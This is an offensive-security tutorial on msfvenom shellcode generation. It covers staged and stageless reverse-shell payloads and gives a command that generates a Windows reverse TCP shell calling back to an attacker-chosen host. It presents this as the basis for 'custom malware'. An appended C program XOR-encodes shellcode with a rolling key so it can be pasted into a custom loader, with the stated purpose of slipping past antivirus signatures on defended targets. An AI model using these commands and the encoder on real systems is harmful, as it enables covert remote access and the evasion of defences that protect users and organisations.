
Shellcode Generators

Open-source shellcode generators exist that can produce a range of payloads, optionally encoded or encrypted, in a form ready to drop into programs written in various languages. The best known is msfvenom, which ships with the Metasploit Framework. Mature commercial C2 (Command & Control) frameworks usually include their own generators that produce shellcode compatible with their listeners.

Msfvenom

Msfvenom lets you prepare a payload in seconds, but every serious antivirus product has signatures for what it generates. Without additional encoding or obfuscation, a generated payload has no chance in a real-world scenario: it will be detected immediately.

Msfvenom has two kinds of output formats (selected with -f):

  • Transform formats (e.g. c, csharp, python, raw): emit the raw payload bytes as an array or variable ready to paste into a program in that language. The bytes themselves carry the same signatures as any other msfvenom output, so on their own they are not usable against a defended target, but they are the right starting point for further encryption or encoding and for a custom loader template.
  • Executable formats (e.g. exe, dll, vbs): emit a ready-made file. Do not use this option. The built-in templates msfvenom wraps the payload in are detected by every antivirus, and encoding or encrypting the payload changes nothing, because what gets flagged is the template itself, not the payload inside it.

There are two basic categories of msfvenom payloads, distinguished by a single character in the name:

  • stageless (e.g. windows/x64/shell_reverse_tcp, with an underscore) - the generated payload contains everything needed to connect back to the listener and serve the shell. Any listener that accepts a plain TCP connection (even nc) will do.
  • staged (e.g. windows/x64/shell/reverse_tcp, with a slash) - the generated payload is only a small stager that connects back and downloads the rest of the shellcode (the stage) from the listener. The listener must therefore speak Metasploit's staging protocol, in practice the multi/handler module. The stager is much smaller than the stageless payload, which matters when the space available for the payload is limited.

NOTE: There are also payloads built specifically for the Metasploit Framework, the open-source C2 framework msfvenom belongs to. On top of a plain remote shell they provide a lot of extra post-exploitation functionality. They follow the same naming convention as above but contain the word "meterpreter" instead of "shell", e.g. windows/x64/meterpreter_reverse_tcp (stageless) and windows/x64/meterpreter/reverse_tcp (staged).

# List of all available payloads
msfvenom --list payloads
 
# List of all available output formats
msfvenom --list formats
 
# Stageless reverse TCP shell as a C array (transform format);
# LHOST/LPORT are the address and port the listener waits on
msfvenom -p windows/x64/shell_reverse_tcp -f c LHOST=$ip LPORT=$port

The generated shellcode can then be embedded in a program written in almost any language to build custom malware.
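The following is an added example, not code from the original page or from the Metasploit project, of what using the transform output "as a basis for further encoding and a custom template" looks like in practice. It takes a buffer in the layout msfvenom -f c emits, XOR-encodes it with a rolling multi-byte key, prints the encoded bytes back out in the same array style (a string-literal array, a fixed number of escaped bytes per line) so they can be pasted into a custom loader, and checks the decode round-trip, including the case where a zero key byte would leave plaintext bytes in the clear. The bytes in buf are constructed placeholders, not real shellcode; KEY, PER_LINE and all function names are this example's own choices. Running the decoded bytes (VirtualAlloc and friends on Windows) is deliberately left out, since that belongs to the loader.

```c
/* Added example (not from the page or the Metasploit project): take a
   buffer in the layout msfvenom -f c emits, XOR-encode it with a rolling
   key, write the result back out in the same layout for a custom template,
   and verify the decode round-trip. buf below is a constructed stand-in,
   not real shellcode; KEY and every function name are this example's own. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Stand-in for "msfvenom -p ... -f c" output (constructed placeholder bytes). */
static unsigned char buf[] =
    "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51";
#define BUF_LEN (sizeof(buf) - 1)   /* ignore the string literal's terminating NUL */

/* Rolling XOR key (assumption: any non-zero bytes; a 0x00 key byte would
   leave the corresponding shellcode bytes unchanged, i.e. in the clear). */
static const unsigned char KEY[] = { 0x5a, 0xc3, 0x91, 0x2e, 0x77 };
#define PER_LINE 15                  /* escaped bytes per output line (assumed layout) */

/* XOR byte i with key[i % keylen]. XOR is its own inverse, so the same
   call both encodes and decodes. */
void xor_rolling(unsigned char *data, size_t len, const unsigned char *key, size_t keylen) {
    for (size_t i = 0; i < len; i++)
        data[i] ^= key[i % keylen];
}

/* Number of positions where a and b hold the same byte; after encoding this
   must be 0, otherwise a zero key byte has leaked plaintext. */
size_t bytes_unchanged(const unsigned char *a, const unsigned char *b, size_t len) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (a[i] == b[i]) n++;
    return n;
}

/* Copy buf into out and encode it with KEY. Returns the payload length,
   or 0 if out is too small. */
size_t encode_buf(unsigned char *out, size_t outsz) {
    if (outsz < BUF_LEN) return 0;
    memcpy(out, buf, BUF_LEN);
    xor_rolling(out, BUF_LEN, KEY, sizeof KEY);
    return BUF_LEN;
}

/* Encode, check that every byte changed, decode, check the original is back.
   Returns 1 on success, 0 on failure. */
int self_test(void) {
    unsigned char work[BUF_LEN];
    if (encode_buf(work, sizeof work) != BUF_LEN) return 0;
    if (bytes_unchanged(work, buf, BUF_LEN) != 0) return 0;
    xor_rolling(work, BUF_LEN, KEY, sizeof KEY);
    return memcmp(work, buf, BUF_LEN) == 0;
}

/* Render data as a C array in the style of msfvenom -f c so it can be pasted
   into a custom template. Returns characters written, or -1 if out is too small. */
int emit_c_array(char *out, size_t outsz, const char *name, const unsigned char *data, size_t len) {
    int n = snprintf(out, outsz, "unsigned char %s[] =\n", name);
    if (n < 0 || (size_t)n >= outsz) return -1;
    size_t pos = (size_t)n;
    for (size_t i = 0; i < len; i++) {
        const char *open  = (i % PER_LINE == 0) ? "\"" : "";
        const char *close = (i == len - 1) ? "\";\n"
                          : (i % PER_LINE == PER_LINE - 1) ? "\"\n" : "";
        n = snprintf(out + pos, outsz - pos, "%s\\x%02x%s", open, (unsigned)data[i], close);
        if (n < 0 || (size_t)n >= outsz - pos) return -1;
        pos += (size_t)n;
    }
    return (int)pos;
}

int main(void) {
    unsigned char enc[BUF_LEN];
    char text[4096];
    if (!self_test()) { fputs("round-trip failed\n", stderr); return 1; }
    encode_buf(enc, sizeof enc);
    if (emit_c_array(text, sizeof text, "encoded", enc, BUF_LEN) < 0) return 1;
    fputs(text, stdout);   /* paste into the custom template together with KEY */
    return 0;
}
```

The printed array goes into the loader together with KEY, and the loader calls xor_rolling on it at runtime before handing the bytes to whatever execution technique it uses. A rolling XOR like this only breaks static signatures on the payload bytes; the loader template around them must not be a known one either, which is exactly why the executable formats above are useless even with encoding.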
